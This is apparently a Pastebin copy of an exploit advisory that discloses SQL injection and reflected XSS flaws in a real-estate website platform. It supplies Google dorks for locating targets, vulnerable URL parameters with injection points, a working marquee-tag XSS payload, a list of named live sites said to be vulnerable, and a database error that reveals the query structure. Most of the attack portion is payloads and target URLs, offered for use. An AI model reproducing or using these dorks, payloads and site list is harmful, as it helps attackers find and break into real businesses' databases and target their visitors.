Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###################################################################
- # Exploit Title : DomusMondo AgestaNet BeniaStudio Domini e Web Hosting XSS SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/08/2019
- # Vendor Homepage : domusmondo.com - agestanet.it - beniastudio.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:/ricerca-immobile.php?prov_imm=
- intext:partner: domusmondo.com Design by Domini e Web Hosting
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- CWE-79 [ Improper Neutralization of Input During
- Web Page Generation ('Cross-site Scripting') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ###################################################################
- # Impact :
- ***********
- DomusMondo AgestaNet BeniaStudio Domini e Web Hosting is prone to an SQL-injection
- vulnerability because it fails to sufficiently sanitize user-supplied data before using
- it in an SQL query. Exploiting this issue could allow an attacker to compromise the
- application, access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- Reflected XSS (or Non-Persistent) :
- ***************************************
- The server reads data directly from the HTTP
- request and reflects it back in the HTTP response. Reflected XSS exploits occur when an
- attacker causes a victim to supply dangerous content to a vulnerable web application,
- which is then reflected back to the victim and executed by the web browser. The most common
- mechanism for delivering malicious content is to include it as a parameter in a URL that is
- posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute
- the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL
- that refers to a vulnerable site. After the site reflects the attacker's content back to the victim,
- the content is executed by the victim's browser.
- ###################################################################
- # SQL Injection Exploit :
- **********************
- /ricerca-immobile.php?prov_imm=&comune=&contratto=1&tipol_imm=
- 1&mq_da=80&mq_a=&prezzo_da=&prezzo_a=&da=&a=[SQL Injection]
- /ricerca-immobile-in-affitto.php?prov_imm=&comune=&contratto=
- &tipol_imm=&mq_da=&mq_a=&prezzo_da=&prezzo_a=&da=[SQL Injection]
- /ricerca-immobile.php?da=&a=[SQL Injection]
- /dettaglio-immobile.php?id=[SQL Injection]
- /contatti_form.php?id_agenzia=[SQL Injection]
- # Cross Site Scripting XSS Exploit :
- ********************************
- /ricerca-immobile.php?prov_imm=&comune=&contratto=
- 1&tipol_imm=1&mq_da=80&mq_a=&prezzo_da=&prezzo_a=&da=&a=
- 1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-
- Found-By-KingSkrupellos</font></marquee>
- ###################################################################
- # Example Vulnerable Sites :
- *************************
- [+] azzurra-immobiliare.it/ricerca-immobile.php?prov_imm=&comune=&contratto=
- 1&tipol_imm=1&mq_da=80&mq_a=&prezzo_da=&prezzo_a=&da=&a=1%27
- [+] azzurra-immobiliare.it/ricerca-immobile.php?prov_imm=&comune=&contratto=
- 1&tipol_imm=1&mq_da=80&mq_a=&prezzo_da=&prezzo_a=&da=&a=
- 1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-
- Found-By-KingSkrupellos</font></marquee>
- [+] casaideaimmobiliare.com/ricerca-immobile.php?prov_imm=&comune=
- &contratto=1&tipol_imm=1&mq_da=80&mq_a=&prezzo_da=
- &prezzo_a=&da=&a=1%27
- [+] centrocasaonline.it/ricerca-immobile.php?prov_imm=&comune=
- &contratto=&localita=&zona=&tipol_imm=&mq_da=&mq_a=
- &prezzo_da=&prezzo_a=&rent_to_buy=&da=240&a=1%27
- [+] misaimmobiliare.it/ricerca-immobile.php?prov_imm=&comune=
- &contratto=1&tipol_imm=1&mq_da=80&mq_a=&prezzo_da=
- &prezzo_a=&da=&a=1%27
- ###################################################################
- # Example SQL Database Error :
- ****************************
- Message: MySQL Query fail: SELECT i.id AS id_imm, i.rif, i.tipo_contratto,
- i.thumb_1, i.prezzo, i.trattative_riservate, i.superficie, i.descr_IT, c.comune,
- a.img_thumb, tc.descr AS des_tip_imm, sc.descr AS des_sottotip, a.email
- AS mail_age FROM immobili AS i JOIN comuni AS c ON i.id_comune =
- c.id JOIN agenzie AS a ON i.id_agenzia = a.id LEFT JOIN tipol_cat_immobili
- AS tc ON i.id_tipologia_immobile = tc.id LEFT JOIN sotto_tipologie_immobili
- AS sc ON i.id_sotto_tipologie_immobili = sc.id WHERE i.pubblica_annuncio =
- 1 AND i.id_agenzia = 02103390429 AND i.tipo_contratto = '1' AND
- i.id_tipologia_immobile = '1' AND i.superficie >= 80 ORDER BY
- i.data_inserzione LIMIT , 10
- MySQL Error:You have an error in your SQL syntax; check the
- manual that corresponds to your MariaDB server version for the
- right syntax to use near ' 10' at line 1
- ###################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment